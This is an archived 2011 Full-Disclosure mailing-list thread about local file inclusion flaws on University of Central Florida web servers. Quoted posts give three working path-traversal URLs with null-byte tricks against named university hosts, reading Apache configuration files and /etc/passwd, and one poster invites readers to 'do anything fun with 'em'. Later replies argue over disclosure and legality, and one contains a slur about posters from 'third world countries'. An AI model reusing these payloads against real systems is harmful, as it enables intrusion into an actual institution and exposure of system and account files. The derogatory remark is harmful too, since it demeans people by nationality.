[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] University of Central Florida Multiple LFI

To: Eyeballing Weev <eyeballing.weev@xxxxxxxxx>
Subject: Re: [Full-disclosure] University of Central Florida Multiple LFI
From: Hack Talk <hacktalkblog@xxxxxxxxx>
Date: Sat, 19 Feb 2011 12:12:51 -0500

I surely help they do too, I haven't had to use my EFF lawyer for a while
and I'd love to hang with him again, he's a really great guy :D.


Luis Santana


On Sat, Feb 19, 2011 at 12:07 PM, Eyeballing Weev <eyeballing.weev@xxxxxxxxx
> wrote:

> Might as well register a new email account too because "hacktalkblog" is
> just as obvious as posting a link to your site. I hope UCF calls FDLE
> and you can explain to Special Agent Veazy and others about your "research"
>
> On 02/19/2011 12:04 PM, Hack Talk wrote:
> > I actually live close to the University of Central Florida and after
> > countless attempt to contact both their infosec team, the "tech
> > rangers", and their personal web developers with no contact back or
> > patching of these vulnerabilities I decided to post these up on FD.
> > There are still many, _many_ more vulnerabilities which I have yet to
> > disclose as I'm still giving them a chance to patch them.
> >
> > Also, I usually remove my website from the email as it's part of my
> > standard email signature, guess I just couldn't be bothered to do it
> > when I sent in this vulnerability. I'll be sure to be better about
> > removing it so people aren't so butthurt.
> >
> >
> > Luis Santana
> >
> >
> >
> > On Sat, Feb 19, 2011 at 11:48 AM, Eyeballing Weev
> > <eyeballing.weev@xxxxxxxxx <mailto:eyeballing.weev@xxxxxxxxx>> wrote:
> >
> >     Madhur Ahuja and "Hack Talk" are obviously from third world countries
> >     and are only doing this for publicity, much like how Turks and
> Romanians
> >     "hack" into websites for defacement purposes. Same concept just
> applied
> >     differently.
> >
> >     On 02/19/2011 11:45 AM, Shawn Merdinger wrote:
> >      > Hi,
> >      >
> >      > At the risk of being ridiculed here, I'll point out that UCF does
> >     have
> >      > a Infosec office and a incident response POC.
> >      >
> >      >
> https://publishing.ucf.edu/sites/itr/cst/Pages/IncidentResponse.aspx
> >      > sirt@xxxxxxxxxxxx <mailto:sirt@xxxxxxxxxxxx>
> >      >
> >      > fwiw, security folks in .edus are at the low-end of this
> industry's
> >      > pay-scale and it's difficult to find/retain qualified people, not
> to
> >      > mention adequate budget for purchasing (even more) crappy security
> >      > products and almost no budget for professional development like
> >      > training and conferences.
> >      >
> >      > I would expect there are more challenging targets out there, were
> one
> >      > inclined...
> >      >
> >      > Cheers,
> >      > --scm
> >      >
> >      >
> >      > On Sat, Feb 19, 2011 at 06:04, Madhur
> >     Ahuja<ahuja.madhur@xxxxxxxxx <mailto:ahuja.madhur@xxxxxxxxx>>
>  wrote:
> >      >>
> >
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
> >      >>
> >      >> On Sat, Feb 19, 2011 at 11:38 AM, Hack
> >     Talk<hacktalkblog@xxxxxxxxx <mailto:hacktalkblog@xxxxxxxxx>>  wrote:
> >      >>>
> >      >>> Found these and thought I'd share:
> >      >>>
> >      >>> -==================-
> >      >>>
> >      >>>
> >
> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
> >      >>>
> >      >>>
> >
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> >      >>> -==================-
> >      >>> Let me know if you do anything fun with 'em
> >      >>>
> >      >>> Luis Santana - Security+
> >      >>> Administrator - http://hacktalk.net
> >      >>> HackTalk Security - Security From The Underground
> >      >>>
> >      >
> >      > _______________________________________________
> >      > Full-Disclosure - We believe in it.
> >      > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >      > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >     _______________________________________________
> >     Full-Disclosure - We believe in it.
> >     Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >     Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] University of Central Florida Multiple LFI
  - From: Hack Talk
- Re: [Full-disclosure] University of Central Florida Multiple LFI
  - From: Madhur Ahuja
- Re: [Full-disclosure] University of Central Florida Multiple LFI
  - From: Shawn Merdinger
- Re: [Full-disclosure] University of Central Florida Multiple LFI
  - From: Eyeballing Weev
- Re: [Full-disclosure] University of Central Florida Multiple LFI
  - From: Hack Talk
- Re: [Full-disclosure] University of Central Florida Multiple LFI
  - From: Eyeballing Weev

Prev by Date: Re: [Full-disclosure] University of Central Florida Multiple LFI
Next by Date: Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏
Previous by thread: Re: [Full-disclosure] University of Central Florida Multiple LFI
Next by thread: Re: [Full-disclosure] University of Central Florida Multiple LFI
Index(es):
- Date
- Thread